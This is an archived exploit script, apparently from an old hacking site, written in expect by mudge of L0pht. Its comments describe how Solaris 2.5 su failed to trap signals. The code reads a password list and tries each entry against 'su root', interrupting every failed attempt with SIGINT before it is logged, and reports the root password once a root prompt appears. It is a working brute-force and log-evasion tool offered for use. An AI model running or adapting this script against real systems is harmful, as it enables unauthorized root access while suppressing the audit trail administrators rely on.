home *** CD-ROM | disk | FTP | other *** search
- #!/usr/local/bin/expect --
-
- # A quick little sploit for a quick round of beers :) mudge@L0pht.com
- #
- # This was something that had been floating around for some time.
- # It might have been bitwrior that pointed out some of the oddities
- # but I don't remember.
- #
- # It was mentioned to Casper Dik at some point and it was fixed in
- # the next rev of Solaris (don't remember if the fix took place in
- # 2.5.1 or 2.6 - I know it is in 2.6 at least).
- #
- # What happened was that the Solaris 2.5 and below systems
- # had /bin/su written in the following fashion :
- #
- # attempt to SU
- # |
- # succesfull
- # / \
- # Y N
- # | |
- # exec cmd sleep
- # |
- # syslog
- # |
- # exit
- #
- # There were a few problems here - not the least of which was that they
- # did not bother to trap signals. Thus, if you noticed su taking a while
- # you most likely entered an incorrect password and were in the
- # sleep phase.
- #
- # Sending a SIGINT by hitting ctrl-c would kill the process
- # before the syslog of the invalid attempt occured.
- #
- # In current versions of /bin/su they DO trap signals.
- #
- # It should be noted that this is a fairly common coding problem that
- # people will find in a lot of "security related" programs.
- #
- # .mudge
-
-
- if { ($argc < 1) || ($argc > 1) } {
- puts "correct usage is : $argv0 pwfile"
- exit
- }
-
- set pwfile [open $argv "r"]
-
- log_user 0
- foreach line [split [read $pwfile] "\n"] {
- spawn su root
- expect "Password:"
- send "$line\n"
- # you might need to tweak this but it should be ok
- set timeout 2
- expect {
- "#" { puts "root password is $line\n" ; exit }
- }
- set id [ exp_pid ]
- exec kill -INT $id
- }
- # www.hack.co.za [2000]#